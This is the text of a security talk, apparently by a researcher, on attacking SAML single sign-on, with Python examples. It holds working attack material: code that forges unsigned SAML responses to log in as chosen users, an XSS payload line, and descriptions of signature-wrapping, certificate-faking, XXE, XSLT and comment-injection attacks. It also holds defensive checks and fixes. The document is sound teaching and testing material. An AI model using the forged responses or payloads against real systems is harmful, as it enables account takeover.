Soup Set No. 5a.
How to hack SAML if I have paws? (original title: Как ломать SAML, если у меня лапки?)
Aleksei “GreenDog” Tiurin
WHOAMI?
- Security researcher
- Invicti Security (Acunetix)
- Green Paws of Relaxation (Зеленые лапки расслабленности)
t.me/greenrelaxpaws
agrrrdog.blogspot.com
github.com/GrrrDog/
Aleksei Tiurin
GreenDog
SAML - Security Assertion Markup Language
● SSO
● Authentication and authorization
● Everywhere
SAML - Security Assertion Markup Language
● Very old standards (~2002-2005)
○ SAML 1.0 / 2.0
● Based on
○ HTTP
○ XML
○ XML Schema
○ XML Digital Signature (XML DSig)
○ XML Encryption
● Complicated standards
○ Protocols/Bindings/Profiles
○ Full specs - hundreds of pages
“10 Years later”
● Old technologies -> old libs
○ xmlsec (java / c)
● Complex configurations
● Many Implementations
https://en.wikipedia.org/wiki/SAML-based_products_and_services
● ZeroNights 2012
● (almost) all the same attacks still work ^_^
Identity Provider (IdP)
- where user creds are stored
- Okta, OneLogin, PingIdentity, MS AAD, etc
- OpenAM, Keycloak, Oracle OAM, Shibboleth, etc
Service Provider (SP)
- an application that a user wants to access
- … Jira, WordPress, AWS ...
- One IdP - many SPs
- Corporate SSO
- One SP - many IdPs
- SaaS that needs to support
multiple organizations
Flows
- SP initiated: SAMLRequest (SP -> IdP), then SAMLResponse (IdP -> SP)
- IdP initiated: starts at the SAMLResponse step (step 4 in the diagram), there is no SAMLRequest
SAMLRequest
- from SP to IdP
- Redirect Binding (GET): DEFLATE + Base64 + URL-encoding in the query string
- POST Binding (HTML form): Base64 only
SAMLResponse
- from IdP to SP
- POST Binding (HTML form)
- Base64 only (no DEFLATE; compression belongs to the Redirect binding)
SAMLResponse: what is signed?
- the Response
- the Assertion
- or both
How does the signature work?
Situations:
- Anonymous attacks
- A user in IdP
- Malicious SP
- Malicious IdP
Core tool
- SAML Raider extension in Burp
Anonymous attacks
1. SAMLRequest: detect that SAML is used
2. From the SAMLRequest:
- Issuer: the SP's entity ID (the IdP will echo it as the Audience)
- AssertionConsumerServiceURL (ACS): where the SP expects the SAMLResponse
- the SP's SAML library: fingerprint it from the ID generator (format, prefix, length) and from element names/order
- Destination: the IdP endpoint
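The two bindings and the recon step above, as an added example (not code from the talk or from any SAML library). It encodes and decodes a SAMLRequest the way each binding requires and pulls the fields listed on slide 14 out of it. The AuthnRequest, hosts, entity IDs and the ID value are constructed for the example; everything is Python standard library.

```python
import base64
import zlib
from urllib.parse import parse_qs, quote, urlsplit
import xml.etree.ElementTree as ET

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
}

# Constructed AuthnRequest: hosts, entity IDs and the ID value are made up.
AUTHN_REQUEST = (
    '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" '
    'ID="_a1b2c3d4e5f6a7b8c9d0" Version="2.0" IssueInstant="2024-01-01T00:00:00Z" '
    'Destination="https://idp.example/sso/saml" '
    'ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" '
    'AssertionConsumerServiceURL="https://sp.example/saml/acs">'
    '<saml:Issuer>https://sp.example/saml/metadata</saml:Issuer>'
    '</samlp:AuthnRequest>'
)


def encode_redirect(xml: str) -> str:
    """HTTP-Redirect binding: raw DEFLATE (no zlib header), then Base64.
    URL-encoding is applied on top when the value goes into the query string."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # wbits=-15 -> raw DEFLATE stream
    return base64.b64encode(comp.compress(xml.encode("utf-8")) + comp.flush()).decode("ascii")


def encode_post(xml: str) -> str:
    """HTTP-POST binding: Base64 only, no compression."""
    return base64.b64encode(xml.encode("utf-8")).decode("ascii")


def decode_saml_message(value: str, binding: str) -> str:
    """Decode a SAMLRequest/SAMLResponse form or query parameter.
    binding is 'redirect' (inflate after Base64) or 'post' (Base64 only)."""
    raw = base64.b64decode(value)
    if binding == "redirect":
        raw = zlib.decompress(raw, -15)
    elif binding != "post":
        raise ValueError(f"unknown binding {binding!r}")
    return raw.decode("utf-8")


def build_redirect_url(idp_sso_url: str, authn_request_xml: str, relay_state: str = "") -> str:
    """What the SP's 302 Location looks like for the (unsigned) Redirect binding.
    safe='' matters: '+' and '/' from Base64 must be percent-encoded or the IdP's
    query parser turns '+' into a space."""
    url = f"{idp_sso_url}?SAMLRequest={quote(encode_redirect(authn_request_xml), safe='')}"
    if relay_state:
        url += f"&RelayState={quote(relay_state, safe='')}"
    return url


def recon_from_authn_request(xml: str) -> dict:
    """The fields an anonymous tester reads off the AuthnRequest: the SP's entity ID,
    where the SP expects the Response (ACS), the IdP endpoint, and the request ID
    whose format hints at the SP library."""
    root = ET.fromstring(xml)
    if root.tag != f"{{{NS['samlp']}}}AuthnRequest":
        raise ValueError("not a samlp:AuthnRequest")
    issuer = root.find("saml:Issuer", NS)
    return {
        "sp_entity_id": issuer.text.strip() if issuer is not None and issuer.text else None,
        "destination": root.get("Destination"),
        "acs_url": root.get("AssertionConsumerServiceURL"),
        "request_id": root.get("ID"),
        "response_binding": root.get("ProtocolBinding"),
    }


def recon_from_redirect_url(url: str) -> dict:
    """Same, starting from the Location header the SP sent the browser to."""
    query = parse_qs(urlsplit(url).query)
    return recon_from_authn_request(decode_saml_message(query["SAMLRequest"][0], "redirect"))
```

The binding is passed explicitly rather than guessed from the bytes: in a proxy you already know whether the value came from a GET query string or a POST form body.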
SAML Metadata
- configuration exchange between SP and IdP
- names (entity IDs), endpoints, certificates…
- signing/encryption settings, additional attributes…
The SP usually doesn't expose its metadata.
IdP metadata:
- known endpoints, e.g. /oamfed/idp/metadata (Oracle OAM)
- derive it from the Destination, e.g. Okta:
okta.com/app/appname/RND/sso/saml ->
okta.com/app/RND/sso/saml/metadata
Now we have almost everything to create
a good SAMLResponse from nothing
Creating a SAML Response
- POST it to the ACS URL
- follow the known SAML schemas
- fill in from the SAMLRequest:
- Destination = ACS URL
- InResponseTo = request ID
- IssueInstant = a fresh timestamp
- Issuer = IdP entity ID from the metadata, in both Response and Assertion
- Subject / NameID: an email?
- Conditions: NotBefore + NotOnOrAfter
- AudienceRestriction: ? (normally the SP's entity ID)
- AuthnStatement: ?
http://www.datypic.com/sc/saml2/e-samlp_Response.html
http://www.datypic.com/sc/saml2/e-saml_Assertion.html
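The slide above as working code, added here as an example and not taken from the talk or from any SAML library: an unsigned samlp:Response assembled only from what an anonymous tester has (ACS URL and request ID from the SAMLRequest, the IdP entity ID from metadata, a guessed NameID), plus the POST-binding encoding and a read-back helper to eyeball the result before sending it. Entity IDs and addresses in the usage are constructed; the lifetime and the 60-second NotBefore skew are arbitrary choices.

```python
import base64
import secrets
from datetime import datetime, timedelta, timezone
import xml.etree.ElementTree as ET

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
DS = "http://www.w3.org/2000/09/xmldsig#"
ET.register_namespace("samlp", SAMLP)
ET.register_namespace("saml", SAML)
EMAIL_FORMAT = "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
PASSWORD_CTX = "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"


def _ts(dt: datetime) -> str:
    return dt.strftime("%Y-%m-%dT%H:%M:%SZ")


def build_response(*, acs_url: str, in_response_to: str, idp_entity_id: str,
                   sp_entity_id: str, name_id: str, now=None, lifetime_s: int = 300) -> str:
    """Unsigned samlp:Response with one Assertion, every field the SP is likely to
    check filled in from values visible to an anonymous tester."""
    now = now or datetime.now(timezone.utc)
    not_after = _ts(now + timedelta(seconds=lifetime_s))
    resp_id = "_" + secrets.token_hex(16)   # NCName: must not start with a digit
    asrt_id = "_" + secrets.token_hex(16)

    resp = ET.Element(f"{{{SAMLP}}}Response", {
        "ID": resp_id, "Version": "2.0", "IssueInstant": _ts(now),
        "Destination": acs_url, "InResponseTo": in_response_to,
    })
    ET.SubElement(resp, f"{{{SAML}}}Issuer").text = idp_entity_id
    status = ET.SubElement(resp, f"{{{SAMLP}}}Status")
    ET.SubElement(status, f"{{{SAMLP}}}StatusCode",
                  {"Value": "urn:oasis:names:tc:SAML:2.0:status:Success"})

    asrt = ET.SubElement(resp, f"{{{SAML}}}Assertion",
                         {"ID": asrt_id, "Version": "2.0", "IssueInstant": _ts(now)})
    ET.SubElement(asrt, f"{{{SAML}}}Issuer").text = idp_entity_id  # both Response and Assertion
    subject = ET.SubElement(asrt, f"{{{SAML}}}Subject")
    ET.SubElement(subject, f"{{{SAML}}}NameID", {"Format": EMAIL_FORMAT}).text = name_id
    conf = ET.SubElement(subject, f"{{{SAML}}}SubjectConfirmation",
                         {"Method": "urn:oasis:names:tc:SAML:2.0:cm:bearer"})
    ET.SubElement(conf, f"{{{SAML}}}SubjectConfirmationData", {
        "InResponseTo": in_response_to, "Recipient": acs_url, "NotOnOrAfter": not_after,
    })
    cond = ET.SubElement(asrt, f"{{{SAML}}}Conditions", {
        "NotBefore": _ts(now - timedelta(seconds=60)), "NotOnOrAfter": not_after,
    })
    aud = ET.SubElement(cond, f"{{{SAML}}}AudienceRestriction")
    ET.SubElement(aud, f"{{{SAML}}}Audience").text = sp_entity_id
    authn = ET.SubElement(asrt, f"{{{SAML}}}AuthnStatement",
                          {"AuthnInstant": _ts(now), "SessionIndex": asrt_id})
    ctx = ET.SubElement(authn, f"{{{SAML}}}AuthnContext")
    ET.SubElement(ctx, f"{{{SAML}}}AuthnContextClassRef").text = PASSWORD_CTX
    return ET.tostring(resp, encoding="unicode")


def post_form_value(response_xml: str) -> str:
    """The SAMLResponse form field for the POST binding: Base64, no compression."""
    return base64.b64encode(response_xml.encode("utf-8")).decode("ascii")


def response_summary(response_xml: str) -> dict:
    """Read back the fields an SP checks, to review the Response before sending it."""
    ns = {"samlp": SAMLP, "saml": SAML}
    root = ET.fromstring(response_xml)
    asrt = root.find("saml:Assertion", ns)
    cond = asrt.find("saml:Conditions", ns)
    return {
        "destination": root.get("Destination"),
        "in_response_to": root.get("InResponseTo"),
        "issuer": root.findtext("saml:Issuer", namespaces=ns),
        "status": root.find("samlp:Status/samlp:StatusCode", ns).get("Value"),
        "name_id": asrt.findtext("saml:Subject/saml:NameID", namespaces=ns),
        "audience": cond.findtext("saml:AudienceRestriction/saml:Audience", namespaces=ns),
        "not_before": cond.get("NotBefore"),
        "not_on_or_after": cond.get("NotOnOrAfter"),
        "signed": root.find(f".//{{{DS}}}Signature") is not None,
    }


if __name__ == "__main__":
    xml = build_response(acs_url="https://sp.example/saml/acs", in_response_to="_a1b2c3d4e5f6a7b8c9d0",
                         idp_entity_id="https://idp.example/metadata",
                         sp_entity_id="https://sp.example/saml/metadata", name_id="admin@sp.example")
    print(response_summary(xml))
    print(post_form_value(xml)[:60] + "...")
```

An SP that accepts this unsigned message is the slide-18 case. For the signature-faking variants later in the deck the same XML is the input you sign in SAML Raider.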
1. XML -> XXE (+ XSD / namespace injection?)
- e.g. CVE-2022-35741 (Apache CloudStack SAML plugin): https://nvd.nist.gov/vuln/detail/CVE-2022-35741
2. XSS
- SPs often show detailed errors for debugging
- rendered before the signature check
- Issuer, Destination, StatusCode, etc. get reflected
- use the created (unsigned) SAML Response
- put an XSS payload into every "field"
- try encodings / CDATA
Destination="><img/src/onerror=alert(1)>"
SAML Response
Authentication bypass
- signature check disabled: a common misconfiguration
- no <Signature/> element -> no signature check at all
https://hackerone.com/reports/136169
- complicated specifications:
- nobody uses the advanced features
- read the documentation (SP/IdP) for what is actually checked
- NameID is usually an email
- find a registered email? or rely on auto-provisioning
- create SAML Response(s), try them, read the error messages
https://mishresec.wordpress.com/2017/10/13/uber-bug-bounty-gaining-access-to-an-internal-chat-system/
KeyInfo
- information about the signing key, inside ds:Signature
- can carry a certificate, including a self-signed one the attacker made
SAML Response
Certificate faking for authentication bypass
- take the IdP certificate from the metadata
- import it into SAML Raider and clone it (same subject/issuer details, attacker's key)
- sign the created SAML Response(s) with it
- works when the SP matches certificates incorrectly (by name/details instead of the key)
- or simply trusts the certificate in KeyInfo
https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#certificate-faking
SAML Response
Dupe Key Confusion (.NET)
- Alvaro Muñoz, Oleksandr Mirosh at Black Hat USA 2019
https://i.blackhat.com/USA-19/Wednesday/us-19-Munoz-SSO-Wars-The-Token-Menace.pdf
- works best starting from a valid (signed) SAML Response
SAML Response
Certificate validation to SSRF
- the SP trusts the certificate in KeyInfo
- and validates it (chain building, revocation checks)
- SSRF via URLs embedded in the X.509 certificate
- Michael Stepankin at Black Hat USA 2023
https://github.com/onhexgroup/Conferences/blob/main/Black%20Hat%20USA%202023%20slides/Michael%20Stepankin_mTLS%20When%20Certificate%20Authentication%20is%20Done%20Wrong.pdf
- Java fetches the AIA, SIA and CRL Distribution Point URLs from the certificate
- take the created SAML Response, add a KeyInfo carrying the SSRF certificate
- Windows? .NET? (open question)
Reference dereferencing
- the data location is given as a URI
- remote files (http, https, etc.)
- local files
- (blind) SSRF, local file read
- Everywhere!
- XML DSig
- XML Enc
- Metadata
- … SAML Response
Reference dereferencing (XML DSig)
- ds:Reference URI
https://github.com/IdentityPython/pysaml2/issues/510
- KeyInfo (RetrievalMethod / KeyInfoReference)
- Java xmlsec: SecureValidation bypass, CVE-2021-40690
https://blog.tint0.com/2021/09/pinging-xmlsec.html
SAML Response
Reference dereferencing (XML Enc)
- CipherReference
- DataReference
- + EncryptedKey -> KeyInfo
Transforms (ds:Transform)
- XML "normalization" (canonicalization)
- additional "preparation" steps applied to the referenced data before it is digested
- Base64
- XPath
- XPath-Filter
- XSLT (optional in the spec, implemented by many libraries)
- …
Base64 http://www.w3.org/2000/09/xmldsig#base64
- .NET XXE, CVE-2022-34716
- the referenced data is Base64-decoded and then parsed as XML
- with an XXE payload inside
https://bugs.chromium.org/p/project-zero/issues/detail?id=2313
XPath http://www.w3.org/TR/1999/REC-xpath-19991116
- blind SSRF
- mix with a Reference to (remote) XML files
- or error-based
- modified version of a payload for PingIdentity from https://blog.tint0.com/2021/09/pinging-xmlsec.html
XSLT http://www.w3.org/TR/1999/REC-xslt-19991116
- Java / Santuario (xmlsec) <= 1.4.1 (~2010)
- the XSLT transform is executed via Xalan -> RCE
- e.g. ManageEngine ServiceDesk, CVE-2022-47966 (shipped an ancient xmlsec)
xmlsec >= 1.4.2
- sets secure-processing = true
- but Xalan < 2.7.2 (CVE-2014-0107) lets the XSLT bypass it
- arbitrary class instantiation
https://blog.viettelcybersecurity.com/saml-show-stopper/
How can we test dereferencing/transforms?
- Acunetix (automated)
- no manual tools: SAML Raider cannot set a Transform Algorithm
- a payload built on unparsed-text() needs XSLT 2.0
- so it won't detect CVE-2022-47966 (Java xmlsec + Xalan, which is XSLT 1.0)
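Slides 18, 20, 23, 24 and 26-32 all come down to what the SP lets the XML-DSig library do before and during verification. The following is an added example, not code from the talk or from any SAML library: a structural pre-check an SP runs on the raw SAMLResponse before handing it to the signature library. It rejects a missing Signature (slide 18), a KeyInfo certificate that is not the pinned IdP certificate (slide 20), a Reference URI that is not the signed element's own ID and a duplicated ID (slides 23-24, wrapping), a KeyInfo RetrievalMethod (slide 24) and any Transform outside enveloped-signature/C14N (slides 26-30). The sample messages are constructed; DigestValue, SignatureValue and the pinned certificate are placeholders, and the function never performs the cryptographic verification itself.

```python
import xml.etree.ElementTree as ET

DS = "http://www.w3.org/2000/09/xmldsig#"

# The only transforms a SAML consumer needs: enveloped-signature plus canonicalization.
ALLOWED_TRANSFORMS = {
    f"{DS}enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
    "http://www.w3.org/2006/12/xml-c14n11",
}

# Constructed placeholder, not a real certificate; it is only compared as a string.
PINNED_CERT = "PINNED-IDP-CERT-PLACEHOLDER-BASE64=="


def sample_response(*, with_signature=True, ref_uri="#_asrt1",
                    transform="http://www.w3.org/2001/10/xml-exc-c14n#",
                    cert=PINNED_CERT, retrieval_method=None) -> str:
    """Constructed SAMLResponse with a signed Assertion. DigestValue/SignatureValue
    are placeholders: this block checks structure only."""
    signature = ""
    if with_signature:
        extra = f'<ds:RetrievalMethod URI="{retrieval_method}"/>' if retrieval_method else ""
        signature = (
            f'<ds:Signature xmlns:ds="{DS}"><ds:SignedInfo>'
            '<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
            '<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>'
            f'<ds:Reference URI="{ref_uri}"><ds:Transforms>'
            f'<ds:Transform Algorithm="{DS}enveloped-signature"/>'
            f'<ds:Transform Algorithm="{transform}"/></ds:Transforms>'
            '<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>'
            '<ds:DigestValue>cGxhY2Vob2xkZXI=</ds:DigestValue></ds:Reference></ds:SignedInfo>'
            '<ds:SignatureValue>cGxhY2Vob2xkZXI=</ds:SignatureValue>'
            f'<ds:KeyInfo>{extra}<ds:X509Data><ds:X509Certificate>{cert}</ds:X509Certificate>'
            '</ds:X509Data></ds:KeyInfo></ds:Signature>'
        )
    return (
        '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
        'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_resp1" Version="2.0">'
        '<saml:Issuer>https://idp.example/metadata</saml:Issuer>'
        '<saml:Assertion ID="_asrt1" Version="2.0">'
        f'<saml:Issuer>https://idp.example/metadata</saml:Issuer>{signature}'
        '<saml:Subject><saml:NameID>alice@sp.example</saml:NameID></saml:Subject>'
        '</saml:Assertion></samlp:Response>'
    )


def _norm(b64: str) -> str:
    return "".join(b64.split())


def precheck_signature(xml: str, pinned_cert_b64: str, required=("Assertion",)) -> list:
    """Structural checks to run BEFORE the XML-DSig library touches the document.
    Returns findings; an empty list means the message may proceed to the real
    cryptographic verification (which this function deliberately does not do)."""
    findings = []
    root = ET.fromstring(xml)
    ids = {}
    for el in root.iter():
        if el.get("ID") is not None:
            ids[el.get("ID")] = ids.get(el.get("ID"), 0) + 1
    signed = {}  # local name of the element carrying ds:Signature -> [(element, signature)]
    for parent in root.iter():
        for child in parent:
            if child.tag == f"{{{DS}}}Signature":
                signed.setdefault(parent.tag.rsplit("}", 1)[-1], []).append((parent, child))

    for name in required:
        if name not in signed:
            findings.append(f"{name}: no ds:Signature; a missing signature must fail, not skip the check")

    for local, pairs in signed.items():
        if len(pairs) != 1:
            findings.append(f"{local}: {len(pairs)} signed {local} elements, expected one")
        for parent, sig in pairs:
            refs = sig.findall(f"{{{DS}}}SignedInfo/{{{DS}}}Reference")
            if len(refs) != 1:
                findings.append(f"{local}: expected one ds:Reference, got {len(refs)}")
            for ref in refs:
                uri = ref.get("URI", "")
                if uri != "#" + (parent.get("ID") or ""):
                    findings.append(f"{local}: Reference URI {uri!r} is not the signed element's own ID "
                                    "(external or cross-document dereference)")
                elif ids.get(uri[1:], 0) > 1:
                    findings.append(f"{local}: ID {uri[1:]!r} occurs {ids[uri[1:]]} times (signature wrapping)")
                for t in ref.findall(f"{{{DS}}}Transforms/{{{DS}}}Transform"):
                    alg = t.get("Algorithm", "")
                    if alg not in ALLOWED_TRANSFORMS:
                        findings.append(f"{local}: transform {alg!r} not allowed "
                                        "(XSLT/XPath/Base64 transforms are attack surface)")
            key_info = sig.find(f"{{{DS}}}KeyInfo")
            if key_info is not None:
                if key_info.find(f"{{{DS}}}RetrievalMethod") is not None:
                    findings.append(f"{local}: KeyInfo/RetrievalMethod would be dereferenced by the library (SSRF)")
                for c in key_info.iter(f"{{{DS}}}X509Certificate"):
                    if _norm(c.text or "") != _norm(pinned_cert_b64):
                        findings.append(f"{local}: KeyInfo certificate is not the pinned IdP certificate; "
                                        "never trust the key the message brings")
    return findings
```

The point of doing this outside the DSig library is ordering: transforms, KeyInfo references and external Reference URIs are processed while the library is still computing digests, i.e. before any verdict on the signature, so a library-level "verify" call is too late to stop them.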
Attacks on IdP
- signed SAMLRequest (AuthnRequest), SP -> IdP: the same signature attacks apply to the IdP
- if the SP uses Redirect (request) / POST (response), switch to POST / POST: the POST binding puts an XML DSig inside the AuthnRequest and exposes the IdP's signature processing
- the rest of the SAML protocol: LogoutRequest, etc.
- metadata import (malicious SP/IdP)
- same attack vectors
With creds / malicious SP/IdP
- transforms evaluated after the signature check
- post-auth: a valid signed message is needed first
- from a "malicious" SP/IdP
- generate a valid signature over arbitrary transforms
- How?
SAML Response
More attacks on IdP (w/ creds)
ACS Spoofing
- change the ACS URL in the SAMLRequest to an attacker's server
- old: https://web-in-security.blogspot.com/2015/04/on-security-of-saml-based-identity.html
- does the IdP compare it as a string or as a parsed URL?
XML injection
- the SAMLRequest is not signed
- values from the SAMLRequest are reflected in the SAMLResponse
- copied as a string, not re-serialized
- so new tags/attributes can be added
- and the result is correctly signed by the IdP
https://research.nccgroup.com/2021/03/29/saml-xml-injection/
Attacks on SP (w/ creds)
- signature check, certificate-related, etc. (as above, now starting from a valid signed Response)
- XSW, XML Signature Wrapping (SAML Raider has the presets)
- XML parsing
- comment injection
https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
- ~2017
- admin@victim.com<!---->.attacker.pw
- the SP reads admin@victim.com, the IdP signed admin@victim.com.attacker.pw
- <? anything ?>: processing instructions inside XML, same trick
- much more
- logic vulnerabilities
- "how to put things together"
- very common
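The comment/PI injection above, as an added example (not code from the talk or from the Duo research). The constructed fragment shows the parsing side: a DOM API that reads only the first text node returns the truncated address, a strict reader refuses anything but text under NameID, and Python's ElementTree merges the text, so the outcome depends on the parser and the call you use. Addresses are made up.

```python
from xml.dom import minidom
import xml.etree.ElementTree as ET

SAML = "urn:oasis:names:tc:SAML:2.0:assertion"


def _assertion(name_id_markup: str) -> str:
    # Constructed fragment; addresses are made up.
    return (
        f'<saml:Assertion xmlns:saml="{SAML}" ID="_1"><saml:Subject>'
        '<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">'
        f'{name_id_markup}</saml:NameID></saml:Subject></saml:Assertion>'
    )


# The IdP signed NameID "admin@victim.com.attacker.pw", an address the attacker owns.
# The attacker then inserts an empty comment into the signed message: C14N without
# comments drops it, so the signature still verifies. A processing instruction is
# canonicalized (so it only survives when the signature does not cover the NameID
# or is not checked), but the parser-side truncation is the same.
WITH_COMMENT = _assertion("admin@victim.com<!---->.attacker.pw")
WITH_PI = _assertion("admin@victim.com<?pi?>.attacker.pw")
CLEAN = _assertion("admin@victim.com.attacker.pw")


def name_id_first_text_node(assertion_xml: str) -> str:
    """Vulnerable pattern: the first text node under NameID (firstChild.data and its
    equivalents in other DOM APIs). A comment or PI splits the text into two nodes
    and only the part before it is returned."""
    doc = minidom.parseString(assertion_xml)
    node = doc.getElementsByTagNameNS(SAML, "NameID")[0]
    return node.firstChild.data


def name_id_strict(assertion_xml: str) -> str:
    """Hardened: allow only text/CDATA children and return the whole value."""
    doc = minidom.parseString(assertion_xml)
    node = doc.getElementsByTagNameNS(SAML, "NameID")[0]
    parts = []
    for child in node.childNodes:
        if child.nodeType in (child.TEXT_NODE, child.CDATA_SECTION_NODE):
            parts.append(child.data)
        else:
            raise ValueError(f"unexpected node type {child.nodeType} inside NameID")
    value = "".join(parts).strip()
    if not value:
        raise ValueError("empty NameID")
    return value


def name_id_elementtree(assertion_xml: str) -> str:
    """For comparison: ElementTree's default TreeBuilder drops comments and PIs and
    joins the surrounding character data, so .text is already the full value."""
    return ET.fromstring(assertion_xml).find(f"{{{SAML}}}Subject/{{{SAML}}}NameID").text
```

Either rejecting (strict) or concatenating (ElementTree behaviour) is fine; what is not fine is an extractor that silently stops at the first node. The same applies to every other identity-bearing value (Attribute values, Issuer, Audience).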
Session handling
RelayState
- state preservation across the SP -> IdP -> SP round trip
- often a URL
- "open redirect"
https://hackerone.com/reports/1923672
https://www.anitian.com/owning-saml/
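Two ways to close the RelayState open redirect, as an added example (not code from the talk or from the linked reports): validating a URL-shaped RelayState down to a local path, and the preferable design where RelayState is an opaque single-use key into server-side state. The in-memory store stands in for a session-bound cache and is an assumption of the example.

```python
import secrets
from urllib.parse import urlsplit, urlunsplit


def safe_return_path(relay_state, default="/", max_len=512) -> str:
    """Treat RelayState as an untrusted hint and only ever redirect to a local path."""
    if not isinstance(relay_state, str) or not relay_state or len(relay_state) > max_len:
        return default
    # Backslashes, whitespace and control characters get normalized by browsers
    # ("/\evil.example" becomes "//evil.example"); reject them outright.
    if any(ch == "\\" or ch.isspace() or ord(ch) < 0x20 for ch in relay_state):
        return default
    # "//host" and "///host" both resolve to another origin in a browser.
    if not relay_state.startswith("/") or relay_state.startswith("//"):
        return default
    parts = urlsplit(relay_state)
    if parts.scheme or parts.netloc:  # absolute URL or protocol-relative URL
        return default
    # Keep path and query, drop any fragment; re-serialize so nothing odd leaks through.
    return urlunsplit(("", "", parts.path, parts.query, ""))


# Assumed server-side store; a real deployment binds this to the user's session.
_STATE = {}


def issue_relay_state(return_path: str) -> str:
    """Preferred design: RelayState is an opaque, single-use key, never a URL."""
    token = secrets.token_urlsafe(32)
    _STATE[token] = safe_return_path(return_path)
    return token


def consume_relay_state(token: str, default="/") -> str:
    """Anything not issued by us (including a URL an attacker put in) maps to the default."""
    return _STATE.pop(token, default)
```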
Multitenant (1 SP - many IdPs)
Don't trust the IdP
- authorization is based on the SAML Response contents
- manipulate NameID, Issuer, ACS
- an email from another tenant -> access to that tenant
IdP confusion https://hackerone.com/reports/976603
- victim's IdP entity ID: "IdP1"
- attacker registers an IdP entity ID "IdP1 " (with a trailing space)
- the signature check runs against the victim's IdP, but the login lands in the attacker's account
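The IdP confusion above, as an added example (not code from the talk or from the linked report). It assumes one plausible shape of the bug: the SP resolves the tenant twice from the Issuer, once leniently for the signing certificate and once exactly for the account mapping, so a message signed by the victim's IdP lands in the attacker's tenant. The hardened version resolves the tenant once, compares exactly, and checks certificate and NameID domain against that single record; the registration check refuses entity IDs that collide after normalization. Tenants, entity IDs and fingerprints are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Tenant:
    name: str
    idp_entity_id: str        # expected <saml:Issuer>, compared byte-for-byte
    idp_cert_fp: str          # fingerprint of the signing cert from that tenant's metadata
    email_domains: frozenset  # domains this tenant may assert NameIDs for


VICTIM_FP = "sha256:victim-cert-placeholder"
ATTACKER_FP = "sha256:attacker-cert-placeholder"

# Constructed tenant table. The attacker registered an IdP entity ID equal to the
# victim's except for a trailing space, which is the slide's "IdP1 ".
TENANTS = [
    Tenant("victim", "https://idp.victim.example/metadata", VICTIM_FP, frozenset({"victim.example"})),
    Tenant("attacker", "https://idp.victim.example/metadata ", ATTACKER_FP, frozenset({"attacker.example"})),
]


def vulnerable_login(issuer: str, signer_fp: str) -> str:
    """Two independent lookups with different normalization (assumed bug shape)."""
    # Lookup 1 (signature): lenient matching picks the first tenant whose entity ID
    # matches after stripping whitespace -> the victim's certificate.
    cert_tenant = next(t for t in TENANTS if t.idp_entity_id.strip() == issuer.strip())
    if cert_tenant.idp_cert_fp != signer_fp:
        raise PermissionError("signature does not verify")
    # Lookup 2 (account mapping): exact matching now selects a different tenant.
    acct_tenant = next(t for t in TENANTS if t.idp_entity_id == issuer)
    return acct_tenant.name


def resolve_tenant(issuer: str) -> Tenant:
    """Exact match only; whitespace or case differences are different strings."""
    matches = [t for t in TENANTS if t.idp_entity_id == issuer]
    if len(matches) != 1:
        raise PermissionError("unknown or ambiguous Issuer")
    return matches[0]


def hardened_login(issuer: str, signer_fp: str, name_id: str) -> str:
    """Resolve the tenant once and check everything against that one record."""
    tenant = resolve_tenant(issuer)
    if tenant.idp_cert_fp != signer_fp:
        raise PermissionError("signature does not verify with this tenant's IdP certificate")
    domain = name_id.rpartition("@")[2].lower()
    if domain not in tenant.email_domains:
        raise PermissionError(f"tenant {tenant.name} may not assert identities in {domain}")
    return tenant.name


def can_register_entity_id(new_entity_id: str) -> bool:
    """Metadata-import check: refuse entity IDs that collide with an existing one after
    the normalizations a lookup somewhere might apply (whitespace, case, trailing slash)."""
    def norm(s: str) -> str:
        return s.strip().rstrip("/").casefold()
    return all(norm(t.idp_entity_id) != norm(new_entity_id) for t in TENANTS)
```

The signer fingerprint stands in for the result of real signature verification; the point is that the certificate used to verify and the tenant the user is logged into must come from the same lookup.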
Recommendations
- don't implement a SAML "lib" yourself
- use 3rd-party libs
- update libs systematically
- show generic errors (no parser or validation details)
- disable unnecessary features
- KeyInfo? XML Enc?
- be careful with metadata
- always pentest your SAML implementation in the SP
- pentest your IdP if it's not SaaS
- write me if you have any questions
Big thanks to the researchers of
mentioned articles/white papers/tools
New cheat sheet about SAML?
https://github.com/GrrrDog/
Green Paws of Relaxation (Зеленые лапки расслабленности)
https://t.me/greenrelaxpaws